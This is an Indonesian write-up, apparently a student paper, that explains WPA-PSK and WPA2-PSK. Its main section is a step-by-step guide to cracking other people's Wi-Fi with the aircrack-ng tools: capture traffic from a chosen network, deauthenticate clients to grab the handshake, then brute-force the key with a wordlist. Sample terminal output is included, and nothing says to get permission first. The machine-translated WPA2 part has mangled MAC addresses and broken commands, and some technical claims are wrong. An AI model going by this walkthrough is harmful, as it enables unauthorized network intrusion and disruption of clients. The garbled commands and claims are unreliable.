Anda di halaman 1dari 4

1.

WPA-PSK
WPA-PSK (Wi-Fi Protected Access Pre Shared Key) adalah pengamanan jaringan
nirkabel dengan menggunakan metoda WPA-PSK jika tidak ada authentikasi server yang
digunakan. Dengan demikian access point dapat dijalankan dengan mode WPA tanpa
menggunakan bantuan komputer lain sebagai server. Cara mengkonfigurasikannya juga cukup
sederhana. Perlu diketahui bahwa tidak semua access point akan mempunyai fasilitas yang sama
dan tidak semua access point menggunakan cara yang sama dalam mendapatkan Shared-Key
yang akan dibagikan ke client.

2. WPA2-PSK
WPA2-PSK adalah security terbaru untuk wireless, dan lebih bagus dari WEP dan WPA-
PSK, tetapi masih bisa untuk dicrack atau disadap tetapi sangat memakan banyak waktu. Dalam
WPA2-PSK ada dua jenis decryption, Advanced Encryption Standard (AES) dan Temporal Key
Integrity Protocol (TKIP). TKIP banyak kelemahan oleh itu lebih baik anda gunakan AES.
Panjang key adalah 8-63, anda boleh memasukkan sama ada 64 hexadecimal atau ASCII(seperti
biasa).
3. CARA KERJA WPA-PSK DAN WPA2-PSK
pemberian Shared-Key dilakukan secara manual tanpa mengetahui algoritma apa yang
digunakan. Keadaan ini berbanding terbalik dengan akses point Linksys WRT54G, dimana
administrator dapat memilih dari dua algoritma WPA yang disediakan, yang terdiri dari
algoritma TKIP atau algoritma AES.
Setelah Shared-Key didapat, maka client yang akan bergabung dengan access point cukup
memasukkan angka/kode yang diijinkan dan dikenal oleh access point. Prinsip kerja yang
digunakan WPA-PSK sangat mirip dengan pengamanan jaringan nirkabel dengan menggunakan
metoda Shared-Key.

4. PERBEDAAN WPA-PSK DENGAN WPA2-PSK


WPA-PSK WPA-PSK adalah security yang lebih update dari WEP. WPA-PSK mempunyai
decryption yang ada pada WEP. Malah ia menambahkan security yang lebih pada wireless
anda. WPA-PSK masih bisa dicrack atau disadap, tetapi mengambil masa lebih lama dari
WEP. Panjang key adalah 8-63, anda boleh memasukkan sama ada 64 hexadecimal atau
ASCII(seperti biasa).
WPA2-PSK memakai sistem Advanced Encryption Standard (AES) dan Temporal Key Integrity Protocol
(TKIP) Panjang key adalah 8-63, anda boleh memasukkan sama ada 64 hexadecimal atau ASCII(seperti biasa).

5. CARA CRAK ATAU BOBOL


A. WPA-PSK
Trik ini menggunakan Backtrack OS Linux, masuk keterminal dan lakukan printah :
1. root@bt:-# airmon-ng
2. root@bt:-# airmon-ng stop wlan0
3. root@bt:-# airmon-ng start wlan0
4. root@bt:-# airodump-ng wlan0 (disini akan dilihat macam2 wireles yang sedang aktif yang
terdeteksi, pilih bssid yg akan di hack yaitu dengan di copy bssid tersebut dan perhatikan bagian
ch yaitu berarti chanel yg harus di ingat)
5. root@bt:-# airodump-ng -c 6 -w zhome bssid 00:6B:7B:A1:11:8B mon0 (c=chanel dan bssid
yang saya cantumkan hanya contoh dan ganti sesuai dengan bssid dan chanel yg mau di hack,
setelah itu enter dan tunggu hingga station mengeluarkan semacam bssid setelah itu buka
terminal kedua dan ketikan)
6. root@bt:-# aireplay-ng -0 5 -a 00:6B:7B:A1:11:8B -c 89:AS:84:B3:89:7C mon0 (kemudian
lihat di terminal pertama dan akan di dapatkan handshake dipojok kanan atas, tekan keyboard
ctrl+c)
7. root@bt:-# aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst zhome*.cap (darkc0de
adalah dictionary passpharase bawaan backtrack)

B. WPA2-PSK
1. Masukkan antarmuka mode monitor
2. Cari jaringan nirkabel (dilindungi dengan WPA2 dan Pre Shared Key)
3. Ambil semua paket
4. Tunggu sampai Anda melihat deauthenticate klien dan klien, sehingga jabat tangan
yang dapat ditangkap
5. Crack tombol menggunakan file kamus (atau melalui John The Ripper)
6. Saya akan menggunakan DWL Teknis-G122 (USB) interface jaringan nirkabel
untuk prosedur ini. Dalam backtrack4, perangkat ini diakui sebagai wlan0.
Pertama, memasukkan kartu ke dalam mode monitor:
root @ bt: ~ # airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
root @ bt: ~ # airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(Monitor mode diaktifkan pada mon0)

7. Temukan jaringan nirkabel yang menggunakan WPA2 / PSK:


root @ bt: ~ # airodump-ng mon0
CH 6] [TERPAKAI: 4 s] [2009/02/21 00:57
BSSID PWR Beacons # Data, # / s CH MB AUTH ESSID Cipher enc
00:19:05 B: 52: AD: F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Lost Tingkat Probe Paket
00:19:05 B: 52: AD: F7 00:01 C: BF: 90:5 B: A3 -29 0-1 12 4 TestNet

8. Berhenti airodump-ng dan jalankan lagi, menulis semua paket ke disk:


mon0 airodump-ng - channel 10 - 00:19:05 bssid B: 52: AD: F7-w / tmp/wpa2

9. Pada titik ini, Anda punya opsi 2: baik menunggu sampai klien menghubungkan
dan jabat tangan 4-arah yang lengkap, atau deauthenticate klien yang ada dan
dengan demikian memaksanya untuk reassociate. Waktu adalah uang, jadi mari kita
kekuatan deauthenticate tersebut. Kami membutuhkan bssid dari AP (-a) dan mac
dari klien yang terhubung (-c)
root @ bt: ~ # aireplay-ng -0 1-a 00:19:05 B: 52: AD: F7-c 00:01 C: BF: 90:5 B: mon0 A3
13:04:19 Menunggu frame suar (BSSID: 00:19:05 B: 52: AD: F7)
pada saluran 10
Mengirim 13:04:20 diarahkan DeAuth 64. STMAC: [00:01 C: BF: 90:5 B: A3] [67 | 66 ACK]
Akibatnya, airodump-ng harus menunjukkan "WPA Handshake:" di sudut kanan atas
CH 10] [TERPAKAI: 2 menit] [2009/02/21 13:04] [jabat tangan WPA: 00:19:05 B: 52: AD: F7
BSSID PWR Beacons # Data RXQ, # / s CH MB AUTH ESSID Cipher enc
00:19:05 B: 52: AD: F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Lost Tingkat Probe Paket
00:19:05 B: 52: AD: F7 00:01 C: BF: 90:5 B: A3 -27 54-54 0 230

10. Berhenti airodump-ng dan pastikan file diciptakan dengan benar


root @ bt: / # ls / tmp/wpa2 *-al
Rw-r - r - 1 root root 35189 2009/02/21 13:04 / tmp/wpa2-01.cap
Rw-r - r - 1 root root 476 2009/02/21 13:04 / tmp/wpa2-01.csv
Rw-r - r - 1 root root 590 2009/02/21 13:04 / tmp/wpa2-01.kismet.csv

11. Formulir titik ini, Anda tidak perlu mendekati jaringan nirkabel. Semua cracking
akan terjadi offline, sehingga Anda dapat berhenti airodump dan proses lainnya
dan bahkan berjalan jauh dari AP. Bahkan, saya sarankan untuk pergi dan
menemukan sendiri tempat yang nyaman di mana Anda dapat tinggal, makan,
tidur, dll .... Cracking kunci PSK WPA2 didasarkan pada bruteforcing, dan dapat
memakan waktu yang sangat sangat lama. Ada 2 cara bruteforcing: salah satu
yang relatif cepat namun tidak menjamin kesuksesan dan salah satu yang sangat
lambat, tapi menjamin bahwa Anda akan menemukan tombol di beberapa titik
waktu. Opsi pertama adalah dengan menggunakan worklist suatu / file
drstionary. Banyak file-file ini dapat ditemukan di internet (misalnya
www.theargon.com atau di packetstorm (lihat arsip)), atau dapat dihasilkan
dengan alat seperti John The Ripper. Setelah wordlist yang dibuat, semua yang
perlu Anda lakukan adalah menjalankan aircrack-ng dengan worklist dan pakan
dalamnya fie tutup yang berisi Handshake WPA2..
Jadi jika Anda wordlist disebut word.lst (bawah / tmp / wordlists), Anda dapat
menjalankan :
aircrack-ng-w / tmp / wordlists / word.lst-b 00:19:05 B: 52: AD: F7 / tmp/wpa2 topi *

12.Keberhasilan retak tombol WPA2 PSK secara langsung terkait dengan kekuatan
file password Anda. Dengan kata lain, Anda mungkin beruntung dan mendapatkan
kunci yang sangat cepat, atau Anda mungkin tidak mendapatkan kunci sama
sekali.
REFERENSI

- http://raytkj.blogspot.com/2012/05/perbedaan-security-wireless-wpa-wpa2.html
- http://jempol-jempolan.blogspot.com/2011/12/cara-crack-wi-fi-wpa-dan-wpa2-psk.html
- http://masddy.web.id/index.php?option=com_content&view=article&id=58&Itemid=64
- http://youngndifferent.blogspot.com/2012/12/pengertian-wep-wpa-wpa2-psk-dan.html
- http://www.alongrhs.co.nr/

Anda mungkin juga menyukai